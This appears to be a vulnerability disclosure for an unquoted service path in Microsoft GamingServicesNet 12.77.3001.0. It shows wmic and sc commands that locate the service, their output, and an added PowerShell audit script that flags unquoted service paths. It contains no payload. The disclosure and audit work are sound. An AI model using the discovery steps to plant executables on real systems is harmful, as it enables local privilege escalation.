Authored by tmrswrr

Microsoft GamingServicesNet version 12.77.3001.0 suffers from an unquoted service path vulnerability.

# Exploit Title: Microsoft GamingServicesNet 12.77.3001.0 - 'GamingServicesNet' Unquoted Service Path
# Exploit Author: tmrswrr
# Exploit Date: 2023-05.17
# Vendor : https://www.microsoft.com/store/productId/9MWPM2CQNLHN
# Version : 12.77.3001.0
# Tested on OS: Windows 10 Enterprise

# Steps to discover Unquoted Service Path:

==============
>> wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Gaming Services    GamingServicesNet    C:\Program Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe    Auto

C:\>sc qc GamingServicesNet
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServicesNet
TYPE : 210 WIN32_PACKAGED_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Gaming Services
DEPENDENCIES : staterepository
SERVICE_START_NAME : NT AUTHORITY\LocalService

C:\>systeminfo
Host Name: DESKTOP-JAN8AJH
OS Name: Microsoft Windows 10 Enterprise Evaluation
OS Version: 10.0.19045 N/A Build 19045
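
An audit version of the discovery step above, as an added PowerShell example that is not part of the original advisory. It flags only services whose executable path (not its arguments) contains a space and is unquoted, and reports the quoted form without changing anything. The function names Get-ServiceExePath and Get-UnquotedServicePath are hypothetical, and the second and third sample records are constructed.

```powershell
# Added example (not from the advisory): flag services whose executable path
# contains a space and is not wrapped in double quotes.

function Get-ServiceExePath {
    param([Parameter(Mandatory)][string]$PathName)
    $p = $PathName.Trim()
    if ($p.StartsWith('"')) { return $null }   # already delimited by quotes
    # Executable portion = shortest prefix ending in ".exe" followed by
    # whitespace or end of string; anything after it is arguments.
    $m = [regex]::Match($p, '^(.+?\.exe)(?=\s|$)', 'IgnoreCase')
    if ($m.Success) { return $m.Groups[1].Value }
    return $null
}

function Get-UnquotedServicePath {
    # Defaults to every service on the local host; pass -Service to test offline.
    param([object[]]$Service = (Get-CimInstance -ClassName Win32_Service))
    foreach ($s in $Service) {
        if (-not $s.PathName) { continue }
        $exe = Get-ServiceExePath -PathName $s.PathName
        # Spaces in arguments are harmless; only a space inside the
        # executable path makes the command line ambiguous.
        if ($exe -and $exe.Contains(' ')) {
            $rest = $s.PathName.Trim().Substring($exe.Length)
            [pscustomobject]@{
                Name       = $s.Name
                StartMode  = $s.StartMode
                PathName   = $s.PathName
                QuotedForm = '"' + $exe + '"' + $rest   # properly quoted value
            }
        }
    }
}

# Sample records: the first uses the path from the advisory, the other two
# are constructed to show a quoted path and a space that is only in arguments.
$sample = @(
    [pscustomobject]@{ Name = 'GamingServicesNet'; StartMode = 'Auto'
        PathName = 'C:\Program Files\WindowsApps\Microsoft.GamingServices_12.77.3001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe' },
    [pscustomobject]@{ Name = 'ExampleQuoted'; StartMode = 'Auto'
        PathName = '"C:\Program Files\Example\svc.exe" -run' },
    [pscustomobject]@{ Name = 'ExampleArgs'; StartMode = 'Auto'
        PathName = 'C:\Windows\System32\svchost.exe -k netsvcs' }
)

# Only GamingServicesNet is reported from the sample set.
Get-UnquotedServicePath -Service $sample | Format-List
```

Calling Get-UnquotedServicePath with no arguments on a Windows host audits the live service list through Win32_Service.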